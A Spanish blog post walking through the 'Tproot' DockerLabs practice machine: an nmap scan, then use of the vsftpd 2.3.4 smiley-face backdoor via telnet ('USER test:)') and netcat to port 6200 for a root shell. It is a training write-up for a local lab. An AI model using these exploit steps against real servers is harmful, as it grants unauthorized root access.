Post

Tproot - DockerLabs

Tproot - DockerLabs

Captura de pantalla de la máquina TProot en DockerLabs

Hoy explotaremos la máquina Tproot de DockerLabs, de dificultad Muy Fácil. Nos aprovecharemos de una vulnerabilidad en vsftpd en una versión sin parche.

Desplegamos la máquina

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
sudo bash auto_deploy.sh tproot.tar
[sudo] contraseña para nmc:     

	                    ##        .         
	              ## ## ##       ==         
	           ## ## ## ##      ===         
	       /""""""""""""""""\___/ ===       
	  ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~
	       \______ o          __/           
	         \    \        __/            
	          \____\______/               
                                          
  ___  ____ ____ _  _ ____ ____ _    ____ ___  ____   
  |  \ |  | |    |_/  |___ |__/ |    |__| |__] [__   
  |__/ |__| |___ | \_ |___ |  \ |___ |  | |__] ___]  
                                         
				     

Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

Escaneo NMAP

Antes que nada, deberemos hacer un escaneo de puertos con nmap para encontrar los puertos abiertos y qué servicios corren en ellos.

1
2
3
4
5
6
7
8
9
10
11
12
➤ nmap -sV -p- --min-rate=100 -T4 172.17.0.2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-17 15:11 CST
Nmap scan report for 172.17.0.2
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.69 seconds

Nos percatamos de que está abierto el puerto 21 con el servicio FTP, que utiliza la versión vsftpd 2.3.4. Esta versión de vsftpd tiene una vulnerabilidad tipo backdoor que se activa cuando se introducen usuarios con “:)”. Al hacerlo, se abre una shell en el puerto 6200, permitiendo acceso remoto al sistema.

Conexión mediante Telnet y Netcat

Nos conectamos con Telnet al puerto 21 y aprovechamos la vulnerabilidad para ingresar sin necesidad de autenticación, usando los comandos: USER test:) PASS test

1
2
3
4
5
6
7
8
➤ telnet 172.17.0.2 21
Trying 172.17.0.2...
Connected to 172.17.0.2.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER test:)
331 Please specify the password.
PASS test

Ponemos a escuchar netcat en el puerto 6200 e intentamos ejecutar el comando whoami.

1
2
3
➤ nc 172.17.0.2 6200
whoami
root

Acceso ROOT obtenido

¡Máquina comprometida! Te deseo un feliz hackeo.

This post is licensed under CC BY 4.0 by the author.

Trending Tags